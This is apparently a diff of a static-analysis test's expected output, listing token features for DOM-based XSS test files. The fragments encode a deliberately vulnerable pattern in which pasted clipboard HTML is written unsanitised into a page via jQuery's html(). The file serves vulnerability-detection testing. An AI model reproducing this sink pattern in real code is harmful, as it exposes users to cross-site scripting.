enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:17:95:20 | data | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:17:95:20 | data | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:17:95:20 | data | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:17:95:20 | data | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:17:95:20 | data | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:17:95:20 | data | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:17:95:20 | data | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:17:95:20 | data | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:17:95:20 | data | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:23:95:31 | inputType | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:23:95:31 | inputType | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:23:95:31 | inputType | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:23:95:31 | inputType | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:23:95:31 | inputType | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:23:95:31 | inputType | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:23:95:31 | inputType | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:23:95:31 | inputType | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:23:95:31 | inputType | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:23:95:31 | inputType | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:23:95:31 | inputType | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:23:95:31 | inputType | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:23:95:31 | inputType | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:23:95:31 | inputType | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:23:95:31 | inputType | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:23:95:31 | inputType | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:23:95:31 | inputType | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:23:95:31 | inputType | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:23:95:31 | inputType | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:23:95:31 | inputType | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:34:95:44 | isComposing | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:34:95:44 | isComposing | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:34:95:44 | isComposing | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:34:95:44 | isComposing | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:34:95:44 | isComposing | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:34:95:44 | isComposing | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:34:95:44 | isComposing | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:34:95:44 | isComposing | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:34:95:44 | isComposing | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:34:95:44 | isComposing | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:34:95:44 | isComposing | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:34:95:44 | isComposing | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:34:95:44 | isComposing | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:34:95:44 | isComposing | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:34:95:44 | isComposing | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:34:95:44 | isComposing | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:34:95:44 | isComposing | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:34:95:44 | isComposing | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:34:95:44 | isComposing | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:34:95:44 | isComposing | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:47:95:58 | dataTransfer | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:47:95:58 | dataTransfer | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:47:95:58 | dataTransfer | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:47:95:58 | dataTransfer | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:47:95:58 | dataTransfer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:47:95:58 | dataTransfer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:47:95:58 | dataTransfer | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:47:95:58 | dataTransfer | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:47:95:58 | dataTransfer | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:47:95:58 | dataTransfer | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:47:95:58 | dataTransfer | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:47:95:58 | dataTransfer | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:47:95:58 | dataTransfer | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:47:95:58 | dataTransfer | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:47:95:58 | dataTransfer | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:47:95:58 | dataTransfer | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:47:95:58 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:47:95:58 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:47:95:58 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:47:95:58 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:64:95:64 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:64:95:64 | e | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:64:95:64 | e | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:64:95:64 | e | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:95:64:95:64 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:96:13:96:25 | !dataTransfer | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:96:13:96:25 | !dataTransfer | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:96:13:96:25 | !dataTransfer | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:96:13:96:25 | !dataTransfer | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:96:13:96:25 | !dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:96:14:96:25 | dataTransfer | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:96:14:96:25 | dataTransfer | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:96:14:96:25 | dataTransfer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:96:14:96:25 | dataTransfer | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:96:14:96:25 | dataTransfer | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:96:14:96:25 | dataTransfer | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:96:14:96:25 | dataTransfer | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:96:14:96:25 | dataTransfer | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:96:14:96:25 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:96:14:96:25 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:15:98:18 | html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:15:98:18 | html | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:15:98:18 | html | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:15:98:18 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:15:98:18 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:15:98:54 | html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:15:98:54 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:15:98:54 | html | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:15:98:54 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:15:98:54 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:15:98:54 | html = ... /html') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:15:98:54 | html = ... /html') | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:15:98:54 | html = ... /html') | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:15:98:54 | html = ... /html') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:15:98:54 | html = ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:22:98:33 | dataTransfer | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:22:98:33 | dataTransfer | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:22:98:33 | dataTransfer | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:22:98:33 | dataTransfer | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:22:98:33 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:22:98:41 | dataTransfer.getData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:22:98:41 | dataTransfer.getData | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:22:98:41 | dataTransfer.getData | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:22:98:41 | dataTransfer.getData | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:22:98:41 | dataTransfer.getData | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:98:22:98:54 | dataTra ... /html') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | | autogenerated/Xss/DomBasedXss/clipboard.ts:98:22:98:54 | dataTra ... /html') | contextSurroundingFunctionParameters | ()\n(e) | | autogenerated/Xss/DomBasedXss/clipboard.ts:98:22:98:54 | dataTra ... /html') | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | | autogenerated/Xss/DomBasedXss/clipboard.ts:98:22:98:54 | dataTra ... /html') | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/clipboard.ts:98:22:98:54 | dataTra ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:22:98:54 | exceptional return of dataTra ... /html') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:22:98:54 | exceptional return of dataTra ... /html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:22:98:54 | exceptional return of dataTra ... /html') | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:22:98:54 | exceptional return of dataTra ... /html') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:22:98:54 | exceptional return of dataTra ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:35:98:41 | getData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:35:98:41 | getData | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:35:98:41 | getData | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:35:98:41 | getData | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:98:35:98:41 | getData | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:98:43:98:53 | 'text/html' | CalleeFlexibleAccessPath | dataTransfer.getData | | autogenerated/Xss/DomBasedXss/clipboard.ts:98:43:98:53 | 'text/html' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:98:43:98:53 | 'text/html' | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12708,6 +95462,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:98:43:98:53 | 'text/html' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/clipboard.ts:98:43:98:53 | 'text/html' | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:98:43:98:53 | 'text/html' | receiverName | dataTransfer | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:9 | $ | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:9 | $ | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:9 | $ | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:9 | $ | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:9 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:16 | $("#id") | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:16 | $("#id") | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:16 | $("#id") | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:16 | $("#id") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:16 | $("#id") | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:16 | exceptional return of $("#id") | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:16 | exceptional return of $("#id") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:16 | exceptional return of $("#id") | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:16 | exceptional return of $("#id") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:16 | exceptional return of $("#id") | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:21 | $("#id").html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:21 | $("#id").html | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:21 | $("#id").html | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:21 | $("#id").html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:21 | $("#id").html | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:27 | $("#id").html(html) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:27 | $("#id").html(html) | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:27 | $("#id").html(html) | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:27 | $("#id").html(html) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:27 | $("#id").html(html) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:27 | exceptional return of $("#id").html(html) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:27 | exceptional return of $("#id").html(html) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:27 | exceptional return of $("#id").html(html) | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:27 | exceptional return of $("#id").html(html) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:9:99:27 | exceptional return of $("#id").html(html) | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:99:11:99:15 | "#id" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/clipboard.ts:99:11:99:15 | "#id" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:99:11:99:15 | "#id" | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12715,6 +95499,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:99:11:99:15 | "#id" | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | | autogenerated/Xss/DomBasedXss/clipboard.ts:99:11:99:15 | "#id" | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/clipboard.ts:99:11:99:15 | "#id" | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:18:99:21 | html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:18:99:21 | html | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:18:99:21 | html | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:18:99:21 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:99:18:99:21 | html | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:99:23:99:26 | html | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/clipboard.ts:99:23:99:26 | html | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:99:23:99:26 | html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12722,18 +95511,410 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:99:23:99:26 | html | enclosingFunctionBody | div document createElement div div addEventListener beforeinput e InputEvent data inputType isComposing dataTransfer e dataTransfer html dataTransfer getData text/html $ #id html html | | autogenerated/Xss/DomBasedXss/clipboard.ts:99:23:99:26 | html | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/clipboard.ts:99:23:99:26 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/custom-element.js:1:1:1:0 | this | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:1:1:1:0 | this | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:1:8:1:17 | * as dummy | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:1:8:1:17 | * as dummy | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:1:8:1:17 | * as dummy | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:1:13:1:17 | dummy | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:1:13:1:17 | dummy | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:1:13:1:17 | dummy | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:1:24:1:30 | 'dummy' | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:1:24:1:30 | 'dummy' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:1:24:1:30 | 'dummy' | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:1:7:1 | class C ... }\\n} | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:1:7:1 | class C ... }\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:1:7:1 | class C ... }\\n} | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:7:3:15 | CustomElm | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:7:3:15 | CustomElm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:7:3:15 | CustomElm | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:25:3:35 | HTMLElement | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:25:3:35 | HTMLElement | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:25:3:35 | HTMLElement | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | 'arguments' object of default constructor of class CustomElm | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | 'arguments' object of default constructor of class CustomElm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | 'arguments' object of default constructor of class CustomElm | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | 'arguments' object of default constructor of class CustomElm | enclosingFunctionName | constructor | +| 